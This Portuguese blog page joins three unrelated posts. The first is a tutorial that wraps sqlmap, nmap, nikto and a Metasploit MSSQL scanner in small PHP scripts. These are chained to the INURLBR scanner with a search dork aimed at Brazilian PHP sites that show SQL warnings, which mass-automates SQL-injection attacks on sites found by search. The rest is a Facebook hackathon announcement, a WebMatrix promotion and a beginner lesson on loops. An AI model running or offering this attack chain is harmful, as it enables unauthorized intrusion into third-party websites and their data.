Desenvolvendo Mini exploits, otimizando seu tempo.

Vamos otimizar nosso tempo criando mini exploits.

mini exploits defino da seguinte forma: É um conjunto de comandos que possibilita execução de varias rotinas, assim poupando tempo. A não ser que queira toda vez digitar sempre os mesmos parâmetros.
Criaremos um mini exploit que vamos usar junto ao SCANNER INURLBR, mas antes você deve entender os parâmetros especiais do scanner INURLBR que usaremos.

1. _TARGET_ é um parâmetro especial que passando para que seja substituído pelo domínio do nosso alvo.
2. _TARGETFULL_ é um parâmetro especial que passando para que seja substituído pela URL inteira do nosso alvo.

Mais detalhes:
https://github.com/googleinurl/SCANNER-INURLBR#---definindo-comando-externo

Tais parâmetros são usados nos comandos de execução em terminal.

• Comando --comand-vul {comando_terminal}--comand-vul Executa comandos no terminal para cada URL encontrada vulnerável.
• Comando --comand-all {comando_terminal}--comand-all Executa comandos no terminal para todas URL's encontradas.

Ex:
Logica de uso:

O scanner INURLBR filtra os resultados dos motores de busca em seguida executando comandos no terminal através dos parâmetros --comands all & vul.

Com tal logica em mente agora podemos criar um mini exploit para executar o SQLMAP em ataques de sql injection, seja ele remoto ou localhost.

1 - Criaremos um miniexploit.php
2 - Agora vamos inserir nossa programação que captura o alvo e toma as devidas rotinas necessárias.

<?php

#COMENTÁRIO:  printando na tela uma mensagem.
echo "[+]  MINI exploit-SQLMAP\n"; 
#COMENTÁRIO: capturando o primeiro parâmetro passado para nosso script.
$target = $argv[1]; 
#COMENTÁRIO: comando sqlmap pronto agora vamos concatenar nosso alvo ao comando.
$command = "sqlmap -u '{$target}' --batch --random-agent --level 2 --risk 1  --answers='follow=N'";
#COMENTÁRIO: agora vamos usar function nativa do php para executar o SQLMAP contra nosso alvo.
system($command, $dados).empty($dados[0]) ? exit() : NULL;

?>

Executando nosso script:
php miniexploit.php http://www.target.com.br

Com nosso exploit funcionando agora vamos vincular com scanner INURLBR.
Comando INURLBR:
Se deseja usar filtro em motores de busca:
ex: php inurlbr.php --dork 'SUA_DORK' -s salvar.txt -q 1,6  --comand-all "php  miniexploit.php '_TARGETFULL_'"

Execução:

Comando executado:

./inurlbr.php --dork 'inurl:php site:.br inurl:(id|pag|new|abir|open|acess) & "Warning: "' -s save.txt -q 1,6 --command-all "php miniexploit.php '_TARGETFULL_'"

Tal logica pode ser usada para executar mais de um comando ou exploit especifico:
Exemplo em código PHP:

$target = $argv[1]; 
$command = "nmap -sV -p 22,80,21 {$target}";
system($command, $dados);

$command = "nikto -h {$target}";
system($command, $dados).empty($dados[0]) ? exit() : NULL;

Exemplo usando msfcli do metasploit  - Hunting For MSSQL:

$target = $argv[1]; 
$command = "msfcli auxiliary/scanner/mssql/mssql_ping RHOSTS={$target} E";

system($command, $dados).empty($dados[0]) ? exit() : NULL;

Resultado é semelhante a isso:
[*] SQL Server information for $target:
[*] tcp = 1433
[*] np = SSHACKTHISBOX-0pipesqlquery
[*] Version = 8.00.194
[*] InstanceName = MSSQLSERVER
[*] IsClustered = No
[*] ServerName = SSHACKTHISBOX-0
[*] Auxiliary module execution completed

Vídeo aula criando um script em Bash pra otimizar um ataque junto ao msfcli.

BAIXAR SCRIPT SCANNER INURLBR

https://github.com/googleinurl/SCANNER-INURLBR

REF'S:
hunting for MSSQL

http://www.offensive-security.com/metasploit-unleashed/Hunting_For_MSSQL

msfcli-basics tutorial

https://www.hackthissite.org/articles/read/1135

msfcli provides a powerful command-line interface to the framework.

http://luom.net/metasploit-unleashed/Msfcli.html

metasploit-unleashed

http://www.offensive-security.com/metasploit-unleashed/Msfcli

learning metaploit framework

http://cs.uccs.edu/~cs591/metasploit/users_guide3_1.pdf

basics of penetration testing

http://www.netpro.me/uploads/1/0/8/7/10874032/openmirrors.com__the_basics_of_hacking_and_penetration_testing__ethical_hacking_and_penetration_testing_made_easy.pdf

bash-scripting with msfcli

http://www.youtube.com/watch?v=Jt6ynMun8Tk

metasploit with 1 command
http://www.governmentsecurity.org/forum/topic/18963-metasploit-with-1-command/

exploiting windows 2003 server reverse shell
http://resources.infosecinstitute.com/exploiting-windows-2003-server-reverse-shell/

Facebook Developers World HACK - São Paulo Inscrição

No World HACK de desenvolvedores do Facebook, engenheiros do Facebook irão orientar você no desenvolvimento de excelentes aplicativos sociais por design. World HACK proporciona a chance que colaborar com colegas e falar pessoalmente com engenheiros do Facebook. Depois, coloque suas habilidades para trabalhar e passe o dia hackeando conosco. Estaremos distribuindo prêmios para os aplicativos com as melhores integrações com o Facebook.

Assuntos:
APIs do Facebook
SDK móvel
Open Graph

Programação
09:00 Inscrição e café da manhã
10:00 Boas vindas e introduções*
10:30 Princípios básicos da plataforma e Open graph
11:30 SDKs móveis
12:30 Almoço
12:30 HACK
15:00 Anúncios/monetização
18:00 Jantar
19:30 Demos e premiação
21:00 Término do evento

Entregam prêmios para equipes ou indivíduos que usarem os APIs com o melhor resultado.
Planeja passar a noite  -- este evento, de um dia de duração, terminará com um jantar e  prêmios!
As vagas são limitadas, então cadastre-se agora para garantir o seu lugar.

Informações & inscrição: https://saopaulobrazil.fbworldhack.com/portal/login.ww

WebMatrix Muito bom para WebDesigner que gosta de facilidade

 

                                         http://www.microsoft.com/web/webmatrix/features.aspx 

O WebMatrix foi criado para simplificar e facilitar o desenvolvimento Web, quer você esteja começando ou apenas executando suas tarefas. Ele permite que você se concentre no que importa: o seu site. Este é um instantâneo de alguns dos grandes benefícios do WebMatrix. 

Um pacote pequeno, porém completo

O WebMatrix é uma ferramenta de desenvolvimento Web gratuita que leva apenas alguns minutos para ser instalada e reúne um servidor Web, um banco de dados e frameworks de programação em uma única experiência integrada. A ferramenta permite codificar, testar e implantar lado a lado aplicativos ASP.NET e PHP.

Cresce com você

Com o WebMatrix na sua estação de trabalho, você usa o mesmo servidor Web poderoso, o mesmo mecanismo de banco de dados e os mesmos frameworks que o seu site na Internet. Isso assegura uma transição de desenvolvimento para produção tranquila e direta.

Quando você estiver pronto, o WebMatrix irá integrar o Visual Studio ao seu fluxo de trabalho. Conecte-se ao Visual Studio para se beneficiar de recursos avançados como depuração e criação de perfis. Além disso, quando você estiver preparado para um servidor de banco de dados relacional de grande volume, mude seu banco de dados e os dados do SQL Server Compact para o SQL Server.

Publicação do site

Com o WebMatrix é possível encontrar o local perfeito para seu site. Use o WebMatrix para encontrar o provedor de hospedagem Web que se adeque aos seus requisitos e use o suporte à publicação interno para FTP, FTPS, e WebDeploy a fim de garantir que seus arquivos, bancos de dados e configurações cheguem intactas na Web.

Banco de dados simplificado

Nunca foi tão fácil usar um banco de dados! O WebMatrix inclui um pequeno banco de dados incorporado chamado SQL Server Compact, que pode residir com o código e o conteúdo do seu site. Use-o para começar a construir o seu próximo site e, quando estiver preparado para publicar, simplesmente copie o arquivo do banco de dados de seu computador para qualquer servidor Web, que ele irá executá-lo, sem necessidade de instalação extra. Outra opção é migrar facilmente o banco de dados e os dados para o SQL Server quando você estiver preparado para um alto volume de tráfego.

Interface elegante, experiência simples

O WebMatrix integra um editor de códigos sofisticado, um editor de bancos de dados, gerenciamento de servidor Web, SEO, publicação FTP, e mais; o WebMatrix fornece uma experiência de desenvolvimento de sites que une todos os principais componentes que você precisa para criar, executar e implantar o site.

Mais do que “Hello World”

Você quer exibir um feed do Twitter? Precisa apresentar um vídeo? O código ajuda a facilitar a execução de tarefas comuns com uma tag simples no seu HTML.

Iniciar > Software Livre

O WebMatrix conecta você a uma infinidade de aplicativos Web populares e de software livre, incluindo DotNetNuke, Umbraco, WordPress, Joomla! e muito mais. Simplesmente selecione um aplicativo da galeria interna e o WebMatrix realiza o download e a instalação do novo site. Os dias de edição manual de arquivos de configuração e de se certificar quanto a possuir todos os componentes certos acabaram há muito tempo. Personalize o site usando o editor de códigos interno e torne-o seu.

Baixar..: http://www.microsoft.com/web/webmatrix/features.aspx

Aprenda a programa $Part - 09

Bem vindo algoritmizeiros…

Parece que foi ontem que começamos nossa série de posts sobre algoritmos, na tentativa de fazer esse mundo melhor com mais programadores =D

Agora, no nono post da série, vamos aprender sobre estruturas de repetição.

Bom, até o momento, sempre fizemos algoritmos lineares, ou seja, ele possui um começo, meio e fim, e segue essa ordem…

As estruturas de repetição, irão repetir determinados comandos, até que uma comparação lógica se torne verdadeira ou falsa.

Vou explicar com exemplos, assim o entendimento se tornará mais fácil.

O Algoritmo abaixo, lê o nome e a nota de três provas de três alunos diferentes…

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43

Algoritmo "MediaHarmonica"   var a, b, c, MH: real nome: caractere   inicio   escreva ("Entre com o nome do aluno: ") leia (nome) escreval ("Entre com as notas das três provas") escreva ("Digite a primeira nota: ") leia (a) escreva ("Digite a segunda nota: ") leia (b) escreva ("Digite a terceira nota: ") leia (c) MH <- 3/(1/a + 1/b +1/c) escreval ("A média harmônica do aluno: ", NOME, " é ", MH) escreva ("Entre com o nome do aluno: ") leia (nome) escreval ("Entre com as notas das três provas") escreva ("Digite a primeira nota: ") leia (a) escreva ("Digite a segunda nota: ") leia (b) escreva ("Digite a terceira nota: ") leia (c) MH <- 3/(1/a + 1/b +1/c) escreval ("A média harmônica do aluno: ", NOME, " é ", MH) escreva ("Entre com o nome do aluno: ") leia (nome) escreval ("Entre com as notas das três provas") escreva ("Digite a primeira nota: ") leia (a) escreva ("Digite a segunda nota: ") leia (b) escreva ("Digite a terceira nota: ") leia (c) MH <- 3/(1/a + 1/b +1/c) escreval ("A média harmônica do aluno: ", NOME, " é ", MH)   fimalgoritmo

Ainda bem que só tínhamos três alunos…

E se fosse uma turma de 40 alunos?

Para isso vamos utilizar estruturas de repetição =)

Na estrutura repita – ate, todos os comandos serão executados e, ao final, haverá uma expressão lógica, para que avalie a repetição, esta que somente irá cessar quando essa expressão for verdadeira.

1 2 3 4

// sintaxe da estrutura de repetição repita      ate

Agora um exemplo didático…

1 2 3 4 5 6 7 8 9 10 11 12 13 14

algoritmo "DemonstraRepeticao"   var i: inteiro   inicio   i <- 1 repita     escreva(i)     i <- i + 1 ate i > 10   fimalgoritmo

Este algoritmo irá retornar na tela do usuário os números: 1 2 3 4 5 6 7 8 9 10

Mais porquê?

Primeiramente foi declarado a variável i como inteiro, logo em seguida utilizamos uma estrutura de repetição, o repita-ate, pedimos para escrever o valor de i e acrescentamos ao seu valor mais uma unidade, ou seja, i + 1.

e até quando isso será repetido?

Até que o valor de i seja maior que 10…

Então quando o valor de i chegou a 11, ele perguntou se i era maior que 10, como a resposta foi verdadeira, ele encerrou a repetição e foi para o próximo comando…

Como não temos mais nada, encerramos nosso algoritmo.

Só que dessa vez, nós teremos 40 alunos em nossa classe!

Não! Agora que já sabemos utilizar uma estrutura de repetição, vamos poupar trabalho e resumir nosso algoritmo!

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25

Algoritmo "MediaHarmonica"   var a, b, c, MH, i: real NOME: caractere   inicio   i <- 1 Repita     escreva("Entre com o nome do aluno: ")     leia(nome)     escreval ("Entre com as notas das três provas")     escreva("Digite a primeira nota: ")     leia(a)     escreva("Digite a segunda nota: ")     leia(b)     escreva("Digite a terceira nota: ")     leia(c)     MH <- 3/(1/a + 1/b +1/c)     escreval("A média harmônica do aluno: ", NOME, " é ", MH)     i <- i + 1 ate i > 40   FimAlgoritmo Credito total a:http://algoritmizando.com/aprenda-a-programar-9-algoritmos/